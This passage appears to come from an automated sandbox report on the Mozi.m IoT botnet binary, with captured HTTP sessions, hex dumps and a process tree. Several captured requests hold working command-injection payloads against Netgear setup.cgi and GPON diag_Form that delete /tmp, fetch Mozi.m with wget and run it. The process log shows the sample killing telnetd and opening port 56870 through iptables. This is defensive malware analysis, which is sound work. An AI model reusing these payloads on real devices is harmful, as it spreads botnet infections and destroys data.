67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 39 31 30 39 32 34 38 34 33 33 36 31 38 39 35 38 31 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=13-47382215-0%200NNN%20RT%281609941487307%2054%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-191092484336189581&edet=22&cinfo=ffffffff&rpinfo=0" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-191092484336189581</iframe></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        6192.168.2.2049116195.154.172.8380
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:07.609225988 CET282OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 14:58:07.714238882 CET284INHTTP/1.1 404 Not Found
                                                                                                        Content-Type: text/html
                                                                                                        Server: Microsoft-IIS/7.5
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        Date: Wed, 06 Jan 2021 13:57:59 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 1245
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        7192.168.2.2059784158.199.197.5680
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:07.804023027 CET285OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 14:58:08.105627060 CET285INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 13:58:07 GMT
                                                                                                        Server: Apache
                                                                                                        Vary: Accept-Encoding
                                                                                                        Content-Length: 207
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 65 74 75 70 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        8192.168.2.2045960104.97.230.22980
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:21.922020912 CET348OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                        Jan 6, 2021 14:58:22.290241003 CET348INHTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 208
                                                                                                        Expires: Wed, 06 Jan 2021 13:58:22 GMT
                                                                                                        Date: Wed, 06 Jan 2021 13:58:22 GMT
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 35 66 33 30 31 37 26 23 34 36 3b 31 36 30 39 39 34 31 35 30 32 26 23 34 36 3b 35 37 61 63 61 63 62 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;45f3017&#46;1609941502&#46;57acacba</BODY></HTML>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        9192.168.2.205240066.49.194.2180
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Jan 6, 2021 14:58:28.688440084 CET382OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                        Jan 6, 2021 14:58:33.834867954 CET403INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 13:58:29 GMT
                                                                                                        Server: Apache/2.4.46 (cPanel) OpenSSL/1.1.1i mod_bwlimited/1.4
                                                                                                        Content-Length: 315
                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        System Behavior

                                                                                                        Analysis Process: Mozi.m PID: 4564 Parent PID: 4517

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:/usr/bin/qemu-arm /tmp/Mozi.m
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: Mozi.m PID: 4578 Parent PID: 4564

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: Mozi.m PID: 4580 Parent PID: 4578

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: Mozi.m PID: 4582 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4582 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4584 Parent PID: 4582

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: killall PID: 4584 Parent PID: 4582

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/usr/bin/killall
                                                                                                        Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                                                        File size:23736 bytes
                                                                                                        MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

                                                                                                        Analysis Process: Mozi.m PID: 4601 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: Mozi.m PID: 4602 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: Mozi.m PID: 4603 Parent PID: 4580

                                                                                                        General

                                                                                                        Start time:14:57:20
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: Mozi.m PID: 4616 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4616 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4618 Parent PID: 4616

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4618 Parent PID: 4616

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: iptables PID: 4622 Parent PID: 4618

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:n/a
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: modprobe PID: 4622 Parent PID: 4618

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/modprobe
                                                                                                        Arguments:/sbin/modprobe ip_tables
                                                                                                        File size:9 bytes
                                                                                                        MD5 hash:3d0e6fb594a9ad9c854ace3e507f86c5

                                                                                                        Analysis Process: Mozi.m PID: 4650 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4650 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4652 Parent PID: 4650

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4652 Parent PID: 4650

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4653 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4653 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4655 Parent PID: 4653

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4655 Parent PID: 4653

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4689 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4689 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4699 Parent PID: 4689

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4699 Parent PID: 4689

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4702 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4702 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4708 Parent PID: 4702

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4708 Parent PID: 4702

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4728 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4728 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT"
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: sh PID: 4736 Parent PID: 4728

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:n/a
                                                                                                        File size:4 bytes
                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                        Analysis Process: iptables PID: 4736 Parent PID: 4728

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/sbin/iptables
                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                                                                                                        File size:13 bytes
                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                        Analysis Process: Mozi.m PID: 4739 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/tmp/Mozi.m
                                                                                                        Arguments:n/a
                                                                                                        File size:307960 bytes
                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                        Analysis Process: sh PID: 4739 Parent PID: 4603

                                                                                                        General

                                                                                                        Start time:14:57:35
                                                                                                        Start date:06/01/2021
                                                                                                        Path:/bin/sh
